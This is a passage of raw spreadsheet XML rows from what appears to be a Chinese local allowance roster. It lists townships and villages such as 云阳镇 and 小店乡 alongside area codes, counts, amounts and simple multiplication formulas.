        <v>4113210417</v>
      </c>
      <c r="G1350" s="14">
        <v>1</v>
      </c>
      <c r="H1350" s="14">
        <v>340</v>
      </c>
      <c r="I1350" s="14">
        <f t="shared" si="65"/>
        <v>340</v>
      </c>
      <c r="J1350" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1350" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1351" ht="23" customHeight="1" spans="1:11">
      <c r="A1351" s="13" t="s">
        <v>3615</v>
      </c>
      <c r="B1351" s="14" t="s">
        <v>3603</v>
      </c>
      <c r="C1351" s="14" t="s">
        <v>3603</v>
      </c>
      <c r="D1351" s="14" t="s">
        <v>1211</v>
      </c>
      <c r="E1351" s="14" t="s">
        <v>3616</v>
      </c>
      <c r="F1351" s="14" t="s">
        <v>3617</v>
      </c>
      <c r="G1351" s="14">
        <v>1</v>
      </c>
      <c r="H1351" s="14">
        <v>340</v>
      </c>
      <c r="I1351" s="14">
        <f t="shared" si="65"/>
        <v>340</v>
      </c>
      <c r="J1351" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1351" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1352" ht="23" customHeight="1" spans="1:11">
      <c r="A1352" s="13" t="s">
        <v>3618</v>
      </c>
      <c r="B1352" s="14" t="s">
        <v>3603</v>
      </c>
      <c r="C1352" s="14" t="s">
        <v>3603</v>
      </c>
      <c r="D1352" s="14" t="s">
        <v>3619</v>
      </c>
      <c r="E1352" s="14" t="s">
        <v>3620</v>
      </c>
      <c r="F1352" s="14" t="s">
        <v>3621</v>
      </c>
      <c r="G1352" s="14">
        <v>1</v>
      </c>
      <c r="H1352" s="14">
        <v>340</v>
      </c>
      <c r="I1352" s="14">
        <f t="shared" si="65"/>
        <v>340</v>
      </c>
      <c r="J1352" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1352" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1353" ht="23" customHeight="1" spans="1:11">
      <c r="A1353" s="13" t="s">
        <v>3622</v>
      </c>
      <c r="B1353" s="14" t="s">
        <v>3603</v>
      </c>
      <c r="C1353" s="14" t="s">
        <v>3623</v>
      </c>
      <c r="D1353" s="14" t="s">
        <v>3624</v>
      </c>
      <c r="E1353" s="14" t="s">
        <v>3625</v>
      </c>
      <c r="F1353" s="14">
        <v>4113210417</v>
      </c>
      <c r="G1353" s="14">
        <v>1</v>
      </c>
      <c r="H1353" s="14">
        <v>340</v>
      </c>
      <c r="I1353" s="14">
        <f t="shared" si="65"/>
        <v>340</v>
      </c>
      <c r="J1353" s="24">
        <v>45108</v>
      </c>
      <c r="K1353" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1354" ht="23" customHeight="1" spans="1:11">
      <c r="A1354" s="13" t="s">
        <v>3626</v>
      </c>
      <c r="B1354" s="14" t="s">
        <v>3603</v>
      </c>
      <c r="C1354" s="14" t="s">
        <v>3603</v>
      </c>
      <c r="D1354" s="14" t="s">
        <v>3627</v>
      </c>
      <c r="E1354" s="14" t="s">
        <v>3609</v>
      </c>
      <c r="F1354" s="14">
        <v>4113210417</v>
      </c>
      <c r="G1354" s="14">
        <v>1</v>
      </c>
      <c r="H1354" s="14">
        <v>340</v>
      </c>
      <c r="I1354" s="14">
        <f t="shared" si="65"/>
        <v>340</v>
      </c>
      <c r="J1354" s="24">
        <v>45108</v>
      </c>
      <c r="K1354" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1355" ht="23" customHeight="1" spans="1:11">
      <c r="A1355" s="13" t="s">
        <v>3628</v>
      </c>
      <c r="B1355" s="14" t="s">
        <v>3603</v>
      </c>
      <c r="C1355" s="14" t="s">
        <v>3603</v>
      </c>
      <c r="D1355" s="14" t="s">
        <v>3629</v>
      </c>
      <c r="E1355" s="14" t="s">
        <v>3630</v>
      </c>
      <c r="F1355" s="14">
        <v>4113210417</v>
      </c>
      <c r="G1355" s="14">
        <v>1</v>
      </c>
      <c r="H1355" s="14">
        <v>340</v>
      </c>
      <c r="I1355" s="14">
        <f t="shared" si="65"/>
        <v>340</v>
      </c>
      <c r="J1355" s="24">
        <v>45108</v>
      </c>
      <c r="K1355" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1356" ht="23" customHeight="1" spans="1:11">
      <c r="A1356" s="13" t="s">
        <v>3631</v>
      </c>
      <c r="B1356" s="14" t="s">
        <v>3603</v>
      </c>
      <c r="C1356" s="14" t="s">
        <v>3603</v>
      </c>
      <c r="D1356" s="14" t="s">
        <v>3632</v>
      </c>
      <c r="E1356" s="14" t="s">
        <v>3633</v>
      </c>
      <c r="F1356" s="14">
        <v>4113210417</v>
      </c>
      <c r="G1356" s="14">
        <v>1</v>
      </c>
      <c r="H1356" s="14">
        <v>340</v>
      </c>
      <c r="I1356" s="14">
        <f t="shared" si="65"/>
        <v>340</v>
      </c>
      <c r="J1356" s="24">
        <v>45108</v>
      </c>
      <c r="K1356" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1357" ht="23" customHeight="1" spans="1:11">
      <c r="A1357" s="13" t="s">
        <v>3634</v>
      </c>
      <c r="B1357" s="14" t="s">
        <v>3603</v>
      </c>
      <c r="C1357" s="14" t="s">
        <v>3603</v>
      </c>
      <c r="D1357" s="14" t="s">
        <v>3635</v>
      </c>
      <c r="E1357" s="14" t="s">
        <v>3636</v>
      </c>
      <c r="F1357" s="14">
        <v>4113210417</v>
      </c>
      <c r="G1357" s="14">
        <v>1</v>
      </c>
      <c r="H1357" s="14">
        <v>340</v>
      </c>
      <c r="I1357" s="14">
        <f t="shared" si="65"/>
        <v>340</v>
      </c>
      <c r="J1357" s="24">
        <v>45108</v>
      </c>
      <c r="K1357" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1358" ht="23" customHeight="1" spans="1:11">
      <c r="A1358" s="13" t="s">
        <v>3637</v>
      </c>
      <c r="B1358" s="14" t="s">
        <v>3603</v>
      </c>
      <c r="C1358" s="14" t="s">
        <v>3603</v>
      </c>
      <c r="D1358" s="14" t="s">
        <v>3638</v>
      </c>
      <c r="E1358" s="14" t="s">
        <v>3639</v>
      </c>
      <c r="F1358" s="14">
        <v>4113210417</v>
      </c>
      <c r="G1358" s="14">
        <v>2</v>
      </c>
      <c r="H1358" s="14">
        <v>300</v>
      </c>
      <c r="I1358" s="14">
        <f t="shared" si="65"/>
        <v>600</v>
      </c>
      <c r="J1358" s="24">
        <v>45108</v>
      </c>
      <c r="K1358" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1359" ht="23" customHeight="1" spans="1:11">
      <c r="A1359" s="13" t="s">
        <v>3640</v>
      </c>
      <c r="B1359" s="14" t="str">
        <f>B1358</f>
        <v>小店乡</v>
      </c>
      <c r="C1359" s="14" t="str">
        <f>C1358</f>
        <v>小店乡</v>
      </c>
      <c r="D1359" s="40" t="s">
        <v>3641</v>
      </c>
      <c r="E1359" s="40" t="s">
        <v>3642</v>
      </c>
      <c r="F1359" s="14">
        <f>F1358</f>
        <v>4113210417</v>
      </c>
      <c r="G1359" s="14"/>
      <c r="H1359" s="14"/>
      <c r="I1359" s="14"/>
      <c r="J1359" s="24"/>
      <c r="K1359" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1360" ht="23" customHeight="1" spans="1:11">
      <c r="A1360" s="13" t="s">
        <v>3643</v>
      </c>
      <c r="B1360" s="14" t="s">
        <v>3603</v>
      </c>
      <c r="C1360" s="14" t="s">
        <v>3603</v>
      </c>
      <c r="D1360" s="14" t="s">
        <v>1229</v>
      </c>
      <c r="E1360" s="14" t="s">
        <v>3644</v>
      </c>
      <c r="F1360" s="14">
        <v>4113210417</v>
      </c>
      <c r="G1360" s="14">
        <v>1</v>
      </c>
      <c r="H1360" s="14">
        <v>340</v>
      </c>
      <c r="I1360" s="14">
        <f t="shared" ref="I1360:I1368" si="66">H1360*G1360</f>
        <v>340</v>
      </c>
      <c r="J1360" s="24">
        <v>45108</v>
      </c>
      <c r="K1360" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1361" ht="23" customHeight="1" spans="1:11">
      <c r="A1361" s="13" t="s">
        <v>3645</v>
      </c>
      <c r="B1361" s="14" t="s">
        <v>3603</v>
      </c>
      <c r="C1361" s="14" t="s">
        <v>3603</v>
      </c>
      <c r="D1361" s="14" t="s">
        <v>3646</v>
      </c>
      <c r="E1361" s="14" t="s">
        <v>3647</v>
      </c>
      <c r="F1361" s="14">
        <v>4113210417</v>
      </c>
      <c r="G1361" s="14">
        <v>1</v>
      </c>
      <c r="H1361" s="14">
        <v>340</v>
      </c>
      <c r="I1361" s="14">
        <f t="shared" si="66"/>
        <v>340</v>
      </c>
      <c r="J1361" s="24">
        <v>45108</v>
      </c>
      <c r="K1361" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1362" ht="23" customHeight="1" spans="1:11">
      <c r="A1362" s="13" t="s">
        <v>3648</v>
      </c>
      <c r="B1362" s="14" t="s">
        <v>3603</v>
      </c>
      <c r="C1362" s="14" t="s">
        <v>3603</v>
      </c>
      <c r="D1362" s="14" t="s">
        <v>3649</v>
      </c>
      <c r="E1362" s="14" t="s">
        <v>3650</v>
      </c>
      <c r="F1362" s="14">
        <v>4113210417</v>
      </c>
      <c r="G1362" s="14">
        <v>1</v>
      </c>
      <c r="H1362" s="14">
        <v>340</v>
      </c>
      <c r="I1362" s="14">
        <f t="shared" si="66"/>
        <v>340</v>
      </c>
      <c r="J1362" s="24">
        <v>45108</v>
      </c>
      <c r="K1362" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1363" ht="23" customHeight="1" spans="1:11">
      <c r="A1363" s="13" t="s">
        <v>3651</v>
      </c>
      <c r="B1363" s="14" t="s">
        <v>3603</v>
      </c>
      <c r="C1363" s="14" t="s">
        <v>3603</v>
      </c>
      <c r="D1363" s="14" t="s">
        <v>3652</v>
      </c>
      <c r="E1363" s="14" t="s">
        <v>3653</v>
      </c>
      <c r="F1363" s="14">
        <v>4113210417</v>
      </c>
      <c r="G1363" s="14">
        <v>1</v>
      </c>
      <c r="H1363" s="14">
        <v>340</v>
      </c>
      <c r="I1363" s="14">
        <f t="shared" si="66"/>
        <v>340</v>
      </c>
      <c r="J1363" s="24">
        <v>45108</v>
      </c>
      <c r="K1363" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1364" ht="23" customHeight="1" spans="1:11">
      <c r="A1364" s="13" t="s">
        <v>3654</v>
      </c>
      <c r="B1364" s="14" t="s">
        <v>3603</v>
      </c>
      <c r="C1364" s="14" t="s">
        <v>3603</v>
      </c>
      <c r="D1364" s="14" t="s">
        <v>3655</v>
      </c>
      <c r="E1364" s="14" t="s">
        <v>3656</v>
      </c>
      <c r="F1364" s="14" t="s">
        <v>3657</v>
      </c>
      <c r="G1364" s="14">
        <v>1</v>
      </c>
      <c r="H1364" s="14">
        <v>340</v>
      </c>
      <c r="I1364" s="14">
        <f t="shared" si="66"/>
        <v>340</v>
      </c>
      <c r="J1364" s="24">
        <v>45108</v>
      </c>
      <c r="K1364" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1365" ht="23" customHeight="1" spans="1:11">
      <c r="A1365" s="13" t="s">
        <v>3658</v>
      </c>
      <c r="B1365" s="14" t="s">
        <v>3603</v>
      </c>
      <c r="C1365" s="14" t="s">
        <v>3603</v>
      </c>
      <c r="D1365" s="14" t="s">
        <v>3659</v>
      </c>
      <c r="E1365" s="14" t="s">
        <v>3660</v>
      </c>
      <c r="F1365" s="14">
        <v>4113210417</v>
      </c>
      <c r="G1365" s="14">
        <v>1</v>
      </c>
      <c r="H1365" s="14">
        <v>340</v>
      </c>
      <c r="I1365" s="14">
        <f t="shared" si="66"/>
        <v>340</v>
      </c>
      <c r="J1365" s="24">
        <v>45108</v>
      </c>
      <c r="K1365" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1366" ht="23" customHeight="1" spans="1:11">
      <c r="A1366" s="13" t="s">
        <v>3661</v>
      </c>
      <c r="B1366" s="14" t="s">
        <v>3603</v>
      </c>
      <c r="C1366" s="14" t="s">
        <v>3603</v>
      </c>
      <c r="D1366" s="14" t="s">
        <v>3662</v>
      </c>
      <c r="E1366" s="14" t="s">
        <v>3663</v>
      </c>
      <c r="F1366" s="14" t="s">
        <v>3664</v>
      </c>
      <c r="G1366" s="14">
        <v>1</v>
      </c>
      <c r="H1366" s="14">
        <v>340</v>
      </c>
      <c r="I1366" s="14">
        <f t="shared" si="66"/>
        <v>340</v>
      </c>
      <c r="J1366" s="24">
        <v>45108</v>
      </c>
      <c r="K1366" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1367" ht="23" customHeight="1" spans="1:11">
      <c r="A1367" s="13" t="s">
        <v>3665</v>
      </c>
      <c r="B1367" s="14" t="s">
        <v>3603</v>
      </c>
      <c r="C1367" s="14" t="s">
        <v>3603</v>
      </c>
      <c r="D1367" s="14" t="s">
        <v>3666</v>
      </c>
      <c r="E1367" s="14" t="s">
        <v>3667</v>
      </c>
      <c r="F1367" s="14">
        <v>4113210417</v>
      </c>
      <c r="G1367" s="14">
        <v>1</v>
      </c>
      <c r="H1367" s="14">
        <v>340</v>
      </c>
      <c r="I1367" s="14">
        <f t="shared" si="66"/>
        <v>340</v>
      </c>
      <c r="J1367" s="24">
        <v>45108</v>
      </c>
      <c r="K1367" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1368" ht="23" customHeight="1" spans="1:11">
      <c r="A1368" s="13" t="s">
        <v>3668</v>
      </c>
      <c r="B1368" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1368" s="14" t="s">
        <v>3670</v>
      </c>
      <c r="D1368" s="14" t="s">
        <v>3671</v>
      </c>
      <c r="E1368" s="14" t="s">
        <v>3672</v>
      </c>
      <c r="F1368" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1368" s="14">
        <v>3</v>
      </c>
      <c r="H1368" s="14">
        <v>310</v>
      </c>
      <c r="I1368" s="14">
        <f t="shared" si="66"/>
        <v>930</v>
      </c>
      <c r="J1368" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1368" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1369" ht="23" customHeight="1" spans="1:11">
      <c r="A1369" s="13" t="s">
        <v>3674</v>
      </c>
      <c r="B1369" s="14" t="str">
        <f>B1368</f>
        <v>云阳镇</v>
      </c>
      <c r="C1369" s="14" t="str">
        <f>C1368</f>
        <v>小关九组</v>
      </c>
      <c r="D1369" s="13" t="s">
        <v>3675</v>
      </c>
      <c r="E1369" s="20" t="s">
        <v>3676</v>
      </c>
      <c r="F1369" s="14" t="str">
        <f>F1368</f>
        <v>4113210521</v>
      </c>
      <c r="G1369" s="14"/>
      <c r="H1369" s="14"/>
      <c r="I1369" s="14"/>
      <c r="J1369" s="14"/>
      <c r="K1369" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1370" ht="23" customHeight="1" spans="1:11">
      <c r="A1370" s="13" t="s">
        <v>3677</v>
      </c>
      <c r="B1370" s="14" t="str">
        <f>B1369</f>
        <v>云阳镇</v>
      </c>
      <c r="C1370" s="14" t="str">
        <f>C1369</f>
        <v>小关九组</v>
      </c>
      <c r="D1370" s="13" t="s">
        <v>3678</v>
      </c>
      <c r="E1370" s="13" t="s">
        <v>3679</v>
      </c>
      <c r="F1370" s="14" t="str">
        <f>F1369</f>
        <v>4113210521</v>
      </c>
      <c r="G1370" s="14"/>
      <c r="H1370" s="14"/>
      <c r="I1370" s="14"/>
      <c r="J1370" s="14"/>
      <c r="K1370" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1371" ht="23" customHeight="1" spans="1:11">
      <c r="A1371" s="13" t="s">
        <v>3680</v>
      </c>
      <c r="B1371" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1371" s="14" t="s">
        <v>3681</v>
      </c>
      <c r="D1371" s="14" t="s">
        <v>3682</v>
      </c>
      <c r="E1371" s="14" t="s">
        <v>3683</v>
      </c>
      <c r="F1371" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1371" s="14">
        <v>1</v>
      </c>
      <c r="H1371" s="14">
        <v>340</v>
      </c>
      <c r="I1371" s="14">
        <f>H1371*G1371</f>
        <v>340</v>
      </c>
      <c r="J1371" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1371" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1372" ht="23" customHeight="1" spans="1:11">
      <c r="A1372" s="13" t="s">
        <v>3684</v>
      </c>
      <c r="B1372" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1372" s="14" t="s">
        <v>3681</v>
      </c>
      <c r="D1372" s="14" t="s">
        <v>3685</v>
      </c>
      <c r="E1372" s="14" t="s">
        <v>1336</v>
      </c>
      <c r="F1372" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1372" s="14">
        <v>2</v>
      </c>
      <c r="H1372" s="14">
        <v>300</v>
      </c>
      <c r="I1372" s="14">
        <f>H1372*G1372</f>
        <v>600</v>
      </c>
      <c r="J1372" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1372" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1373" ht="23" customHeight="1" spans="1:11">
      <c r="A1373" s="13" t="s">
        <v>3686</v>
      </c>
      <c r="B1373" s="14" t="str">
        <f>B1372</f>
        <v>云阳镇</v>
      </c>
      <c r="C1373" s="14" t="str">
        <f>C1372</f>
        <v>小关四组</v>
      </c>
      <c r="D1373" s="13" t="s">
        <v>3687</v>
      </c>
      <c r="E1373" s="13" t="s">
        <v>3688</v>
      </c>
      <c r="F1373" s="14" t="str">
        <f>F1372</f>
        <v>4113210521</v>
      </c>
      <c r="G1373" s="14"/>
      <c r="H1373" s="14"/>
      <c r="I1373" s="14"/>
      <c r="J1373" s="14"/>
      <c r="K1373" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1374" ht="23" customHeight="1" spans="1:11">
      <c r="A1374" s="13" t="s">
        <v>3689</v>
      </c>
      <c r="B1374" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1374" s="14" t="s">
        <v>3690</v>
      </c>
      <c r="D1374" s="14" t="s">
        <v>3691</v>
      </c>
      <c r="E1374" s="14" t="s">
        <v>3692</v>
      </c>
      <c r="F1374" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1374" s="14">
        <v>1</v>
      </c>
      <c r="H1374" s="14">
        <v>340</v>
      </c>
      <c r="I1374" s="14">
        <f t="shared" ref="I1374:I1379" si="67">H1374*G1374</f>
        <v>340</v>
      </c>
      <c r="J1374" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1374" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1375" ht="23" customHeight="1" spans="1:11">
      <c r="A1375" s="13" t="s">
        <v>3694</v>
      </c>
      <c r="B1375" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1375" s="14" t="s">
        <v>3695</v>
      </c>
      <c r="D1375" s="14" t="s">
        <v>3696</v>
      </c>
      <c r="E1375" s="14" t="s">
        <v>3697</v>
      </c>
      <c r="F1375" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1375" s="14">
        <v>1</v>
      </c>
      <c r="H1375" s="14">
        <v>340</v>
      </c>
      <c r="I1375" s="14">
        <f t="shared" si="67"/>
        <v>340</v>
      </c>
      <c r="J1375" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1375" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1376" ht="23" customHeight="1" spans="1:11">
      <c r="A1376" s="13" t="s">
        <v>3698</v>
      </c>
      <c r="B1376" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1376" s="14" t="s">
        <v>3699</v>
      </c>
      <c r="D1376" s="14" t="s">
        <v>3700</v>
      </c>
      <c r="E1376" s="14" t="s">
        <v>3701</v>
      </c>
      <c r="F1376" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1376" s="14">
        <v>1</v>
      </c>
      <c r="H1376" s="14">
        <v>340</v>
      </c>
      <c r="I1376" s="14">
        <f t="shared" si="67"/>
        <v>340</v>
      </c>
      <c r="J1376" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1376" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1377" ht="23" customHeight="1" spans="1:11">
      <c r="A1377" s="13" t="s">
        <v>3703</v>
      </c>
      <c r="B1377" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1377" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1377" s="14" t="s">
        <v>3705</v>
      </c>
      <c r="E1377" s="14" t="s">
        <v>3706</v>
      </c>
      <c r="F1377" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1377" s="14">
        <v>1</v>
      </c>
      <c r="H1377" s="14">
        <v>340</v>
      </c>
      <c r="I1377" s="14">
        <f t="shared" si="67"/>
        <v>340</v>
      </c>
      <c r="J1377" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1377" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1378" ht="23" customHeight="1" spans="1:11">
      <c r="A1378" s="13" t="s">
        <v>3708</v>
      </c>
      <c r="B1378" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1378" s="14" t="s">
        <v>3699</v>
      </c>
      <c r="D1378" s="14" t="s">
        <v>3709</v>
      </c>
      <c r="E1378" s="14" t="s">
        <v>3710</v>
      </c>
      <c r="F1378" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1378" s="14">
        <v>1</v>
      </c>
      <c r="H1378" s="14">
        <v>340</v>
      </c>
      <c r="I1378" s="14">
        <f t="shared" si="67"/>
        <v>340</v>
      </c>
      <c r="J1378" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1378" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1379" ht="23" customHeight="1" spans="1:11">
      <c r="A1379" s="13" t="s">
        <v>3711</v>
      </c>
      <c r="B1379" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1379" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1379" s="14" t="s">
        <v>3712</v>
      </c>
      <c r="E1379" s="14" t="s">
        <v>3713</v>
      </c>
      <c r="F1379" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1379" s="14">
        <v>2</v>
      </c>
      <c r="H1379" s="14">
        <v>300</v>
      </c>
      <c r="I1379" s="14">
        <f t="shared" si="67"/>
        <v>600</v>
      </c>
      <c r="J1379" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1379" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1380" ht="23" customHeight="1" spans="1:11">
      <c r="A1380" s="13" t="s">
        <v>3714</v>
      </c>
      <c r="B1380" s="14" t="str">
        <f>B1379</f>
        <v>云阳镇</v>
      </c>
      <c r="C1380" s="14" t="str">
        <f>C1379</f>
        <v>南召店袁庄</v>
      </c>
      <c r="D1380" s="13" t="s">
        <v>3715</v>
      </c>
      <c r="E1380" s="13" t="s">
        <v>3716</v>
      </c>
      <c r="F1380" s="14" t="str">
        <f>F1379</f>
        <v>4113210519</v>
      </c>
      <c r="G1380" s="14"/>
      <c r="H1380" s="14"/>
      <c r="I1380" s="14"/>
      <c r="J1380" s="14"/>
      <c r="K1380" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1381" ht="23" customHeight="1" spans="1:11">
      <c r="A1381" s="13" t="s">
        <v>3717</v>
      </c>
      <c r="B1381" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1381" s="14" t="s">
        <v>3718</v>
      </c>
      <c r="D1381" s="14" t="s">
        <v>3719</v>
      </c>
      <c r="E1381" s="14" t="s">
        <v>3706</v>
      </c>
      <c r="F1381" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1381" s="14">
        <v>1</v>
      </c>
      <c r="H1381" s="14">
        <v>340</v>
      </c>
      <c r="I1381" s="14">
        <f t="shared" ref="I1381:I1386" si="68">H1381*G1381</f>
        <v>340</v>
      </c>
      <c r="J1381" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1381" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1382" ht="23" customHeight="1" spans="1:11">
      <c r="A1382" s="13" t="s">
        <v>3720</v>
      </c>
      <c r="B1382" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1382" s="14" t="s">
        <v>3721</v>
      </c>
      <c r="D1382" s="14" t="s">
        <v>3722</v>
      </c>
      <c r="E1382" s="14" t="s">
        <v>3723</v>
      </c>
      <c r="F1382" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1382" s="14">
        <v>1</v>
      </c>
      <c r="H1382" s="14">
        <v>340</v>
      </c>
      <c r="I1382" s="14">
        <f t="shared" si="68"/>
        <v>340</v>
      </c>
      <c r="J1382" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1382" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1383" ht="23" customHeight="1" spans="1:11">
      <c r="A1383" s="13" t="s">
        <v>3724</v>
      </c>
      <c r="B1383" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1383" s="14" t="s">
        <v>3725</v>
      </c>
      <c r="D1383" s="14" t="s">
        <v>3726</v>
      </c>
      <c r="E1383" s="14" t="s">
        <v>3727</v>
      </c>
      <c r="F1383" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1383" s="14">
        <v>1</v>
      </c>
      <c r="H1383" s="14">
        <v>340</v>
      </c>
      <c r="I1383" s="14">
        <f t="shared" si="68"/>
        <v>340</v>
      </c>
      <c r="J1383" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1383" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1384" ht="23" customHeight="1" spans="1:11">
      <c r="A1384" s="13" t="s">
        <v>3728</v>
      </c>
      <c r="B1384" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1384" s="14" t="s">
        <v>3725</v>
      </c>
      <c r="D1384" s="14" t="s">
        <v>3729</v>
      </c>
      <c r="E1384" s="14" t="s">
        <v>3730</v>
      </c>
      <c r="F1384" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1384" s="14">
        <v>1</v>
      </c>
      <c r="H1384" s="14">
        <v>340</v>
      </c>
      <c r="I1384" s="14">
        <f t="shared" si="68"/>
        <v>340</v>
      </c>
      <c r="J1384" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1384" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1385" ht="23" customHeight="1" spans="1:11">
      <c r="A1385" s="13" t="s">
        <v>3731</v>
      </c>
      <c r="B1385" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1385" s="14" t="s">
        <v>3690</v>
      </c>
      <c r="D1385" s="14" t="s">
        <v>3732</v>
      </c>
      <c r="E1385" s="14" t="s">
        <v>3733</v>
      </c>
      <c r="F1385" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1385" s="14">
        <v>1</v>
      </c>
      <c r="H1385" s="14">
        <v>340</v>
      </c>
      <c r="I1385" s="14">
        <f t="shared" si="68"/>
        <v>340</v>
      </c>
      <c r="J1385" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1385" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1386" ht="23" customHeight="1" spans="1:11">
      <c r="A1386" s="13" t="s">
        <v>3734</v>
      </c>
      <c r="B1386" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1386" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1386" s="14" t="s">
        <v>3735</v>
      </c>
      <c r="E1386" s="14" t="s">
        <v>3736</v>
      </c>
      <c r="F1386" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1386" s="14">
        <v>2</v>
      </c>
      <c r="H1386" s="14">
        <v>300</v>
      </c>
      <c r="I1386" s="14">
        <f t="shared" si="68"/>
        <v>600</v>
      </c>
      <c r="J1386" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1386" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1387" ht="23" customHeight="1" spans="1:11">
      <c r="A1387" s="13" t="s">
        <v>3737</v>
      </c>
      <c r="B1387" s="14" t="str">
        <f>B1386</f>
        <v>云阳镇</v>
      </c>
      <c r="C1387" s="14" t="str">
        <f>C1386</f>
        <v>南召店袁庄</v>
      </c>
      <c r="D1387" s="13" t="s">
        <v>3738</v>
      </c>
      <c r="E1387" s="13" t="s">
        <v>2632</v>
      </c>
      <c r="F1387" s="14" t="str">
        <f>F1386</f>
        <v>4113210519</v>
      </c>
      <c r="G1387" s="14"/>
      <c r="H1387" s="14"/>
      <c r="I1387" s="14"/>
      <c r="J1387" s="14"/>
      <c r="K1387" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1388" ht="23" customHeight="1" spans="1:11">
      <c r="A1388" s="13" t="s">
        <v>3739</v>
      </c>
      <c r="B1388" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1388" s="14" t="s">
        <v>3740</v>
      </c>
      <c r="D1388" s="14" t="s">
        <v>3741</v>
      </c>
      <c r="E1388" s="14" t="s">
        <v>3742</v>
      </c>
      <c r="F1388" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1388" s="14">
        <v>1</v>
      </c>
      <c r="H1388" s="14">
        <v>340</v>
      </c>
      <c r="I1388" s="14">
        <f>H1388*G1388</f>
        <v>340</v>
      </c>
      <c r="J1388" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1388" s="14" t="s">
        <v>225</v>
      </c>
    </row>
